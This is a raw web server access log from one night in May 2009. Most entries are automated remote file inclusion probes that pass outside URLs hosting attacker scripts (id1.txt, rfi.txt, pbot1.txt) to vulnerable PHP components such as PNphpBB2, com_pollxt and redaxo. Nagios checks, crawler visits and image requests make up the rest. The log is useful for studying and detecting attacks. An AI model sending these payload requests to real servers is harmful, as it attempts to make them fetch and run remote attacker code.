218.185.20.88 - - [31/May/2009:00:00:01 -0400] "GET /logs/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:00:00:01 -0400] "GET /errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:00:00:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.238.162.72 - - [31/May/2009:00:02:01 -0400] "GET /home.php?pagina=http://festzim.com/fest/b1tchXs4f3.txt?? HTTP/1.1" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.238.162.72 - - [31/May/2009:00:02:01 -0400] "GET /logs/home.php?pagina=http://festzim.com/fest/b1tchXs4f3.txt?? HTTP/1.1" 404 211 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
87.238.162.72 - - [31/May/2009:00:02:01 -0400] "GET /logs/access_log.Q109052200/home.php?pagina=http://festzim.com/fest/b1tchXs4f3.txt?? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
85.18.117.101 - - [31/May/2009:00:04:01 -0400] "GET /logs/access_log.Q109051800%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
58.225.75.155 - - [31/May/2009:00:04:20 -0400] "GET /logs/error_log.Q108051600/include/mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
67.212.165.114 - - [31/May/2009:00:05:25 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:00:05:25 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:00:05:25 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
99.28.95.184 - - [31/May/2009:00:05:26 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
99.28.95.184 - - [31/May/2009:00:05:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
99.28.95.184 - - [31/May/2009:00:05:30 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
99.28.95.184 - - [31/May/2009:00:05:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
209.59.12.99 - - [31/May/2009:00:05:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.185.20.88 - - [31/May/2009:00:05:52 -0400] "GET /errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:00:05:52 -0400] "GET /logs/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:00:05:52 -0400] "GET /logs/access_log.Q109050900/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:00:06:48 -0400] "GET /logs/access_log.Q109051800%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:00:06:49 -0400] "GET /errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:00:06:49 -0400] "GET /logs/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:00:08:19 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:00:08:19 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.249.36.194 - - [31/May/2009:00:08:19 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.203.180.144 - - [31/May/2009:00:09:49 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:09:49 -0400] "GET /logs/error_log.Q109010800//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:09:49 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:09:49 -0400] "GET /logs/error_log.Q108121200//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:10:08 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:10:08 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:10:08 -0400] "GET /logs/error_log.Q109010800//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:10:08 -0400] "GET /logs/error_log.Q108121200//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
209.59.12.99 - - [31/May/2009:00:10:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [31/May/2009:00:11:06 -0400] "GET /logs/access_log.Q109050700/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jamur-x.do.am/id1.txt??????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:00:11:07 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:00:11:07 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:00:11:24 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:00:11:25 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:00:11:25 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:00:11:27 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.203.180.144 - - [31/May/2009:00:11:33 -0400] "GET /logs/error_log.Q108100500%20//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:11:52 -0400] "GET /logs/error_log.Q108100500%20//admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
218.185.20.88 - - [31/May/2009:00:12:15 -0400] "GET /errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:00:12:15 -0400] "GET /logs/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:00:12:15 -0400] "GET /logs/access_log.Q108121900/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:00:14:19 -0400] "GET /logs/access_log.Q109050900/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:00:15:03 -0400] "GET /logs/error_log.Q108122100%20%20/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.185.20.88 - - [31/May/2009:00:15:17 -0400] "GET /logs/access_log.Q108121900%20%20/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
58.225.75.155 - - [31/May/2009:00:15:34 -0400] "GET /logs/error_log.Q108111600//mail.inc.php?skin_board_path=http://stptcellular.net/webalizer/v4id.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
209.59.12.99 - - [31/May/2009:00:15:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.8.108 - - [31/May/2009:00:16:13 -0400] "GET /logs/access_log.Q108092000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.92.97.90 - - [31/May/2009:00:18:00 -0400] "GET /logs/access_log.Q109052200//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
81.92.97.90 - - [31/May/2009:00:18:00 -0400] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.92.97.90 - - [31/May/2009:00:18:00 -0400] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.67.16 - - [31/May/2009:00:18:39 -0400] "GET /logs/error_log.Q108090400 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.18.117.101 - - [31/May/2009:00:20:29 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:00:20:29 -0400] "GET /logs/access_log.Q109050300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:00:20:29 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:00:20:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.212.165.114 - - [31/May/2009:00:24:00 -0400] "GET //citywriter/head.php?path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:00:24:00 -0400] "GET /logs//citywriter/head.php?path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:00:24:00 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:00:24:14 -0400] "GET /logs/access_log.Q109051700//citywriter/head.php?path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:00:24:15 -0400] "GET //citywriter/head.php?path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:00:24:15 -0400] "GET /logs//citywriter/head.php?path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:00:24:16 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:00:25:14 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:00:25:16 -0400] "GET /logs/access_log.Q109050300%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.212.165.114 - - [31/May/2009:00:25:19 -0400] "GET /logs/access_log.Q109051700%20%20//citywriter/head.php?path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
203.22.204.193 - - [31/May/2009:00:25:23 -0400] "GET /logs/access_log.Q109051500//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [31/May/2009:00:25:47 -0400] "GET /logs/access_log.Q109051700//citywriter/head.php?path=http://tkc21.co.kr/bbs/security/online/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:00:25:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.18.117.101 - - [31/May/2009:00:26:12 -0400] "GET /logs/access_log.Q109050300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:00:26:17 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:00:26:17 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:00:28:16 -0400] "GET /logs/access_log.Q109051100%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
80.93.90.41 - - [31/May/2009:00:28:28 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.torgi.kz/help/idxx.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
80.93.90.41 - - [31/May/2009:00:28:28 -0400] "GET /?sourcedir=http://www.torgi.kz/help/idxx.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
80.93.90.41 - - [31/May/2009:00:28:28 -0400] "GET /logs/?sourcedir=http://www.torgi.kz/help/idxx.txt? HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
85.18.117.101 - - [31/May/2009:00:29:01 -0400] "GET /logs/access_log.Q109050300%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.203.180.144 - - [31/May/2009:00:30:22 -0400] "GET /logs/error_log.Q109050500//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:30:22 -0400] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:30:22 -0400] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:30:25 -0400] "GET /logs/error_log.Q109050500//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:30:25 -0400] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
211.203.180.144 - - [31/May/2009:00:30:25 -0400] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
209.59.12.99 - - [31/May/2009:00:30:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.41.205.41 - - [31/May/2009:00:31:18 -0400] "GET /http://www.festzim.com/gks/tcl/idx? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
189.176.26.210 - - [31/May/2009:00:31:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; yie8)"
189.176.26.210 - - [31/May/2009:00:31:43 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; yie8)"
85.18.117.101 - - [31/May/2009:00:31:48 -0400] "GET /logs/access_log.Q109051100%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [31/May/2009:00:35:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.18.117.101 - - [31/May/2009:00:36:07 -0400] "GET /logs/access_log.Q109051100//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1353618.stratoserver.net/kampagnen/bildungsstreik2008/includes/id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:38:40 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:38:40 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:38:41 -0400] "GET /logs/error_log.Q109050500%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:38:43 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:38:43 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:38:44 -0400] "GET /logs/error_log.Q109050500%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:38:44 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:38:45 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:38:45 -0400] "GET /logs/error_log.Q109050500%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:39:25 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:39:26 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:39:27 -0400] "GET /logs/error_log.Q109050500%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:39:34 -0400] "GET /redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:39:35 -0400] "GET /logs/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:39:35 -0400] "GET /logs/error_log.Q109050500%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:40:01 -0400] "GET /logs/access_log.Q109051000%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:40:03 -0400] "GET /logs/access_log.Q109051000%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:40:04 -0400] "GET /logs/access_log.Q109051000%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
85.214.83.196 - - [31/May/2009:00:40:34 -0400] "GET /logs/access_log.Q109051000%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
78.31.64.178 - - [31/May/2009:00:40:44 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:00:40:44 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:00:40:45 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:00:40:45 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:00:40:45 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:00:40:45 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
85.214.83.196 - - [31/May/2009:00:40:48 -0400] "GET /logs/access_log.Q109051000%20%20/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
88.191.103.144 - - [31/May/2009:00:41:47 -0400] "GET /index.php?pag=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.825"
78.31.64.178 - - [31/May/2009:00:46:26 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif????? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
78.31.64.178 - - [31/May/2009:00:46:26 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.optimo-wirtschaftskanzlei.de/pbot1.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
64.6.231.215 - - [31/May/2009:00:46:31 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
64.6.231.215 - - [31/May/2009:00:46:31 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
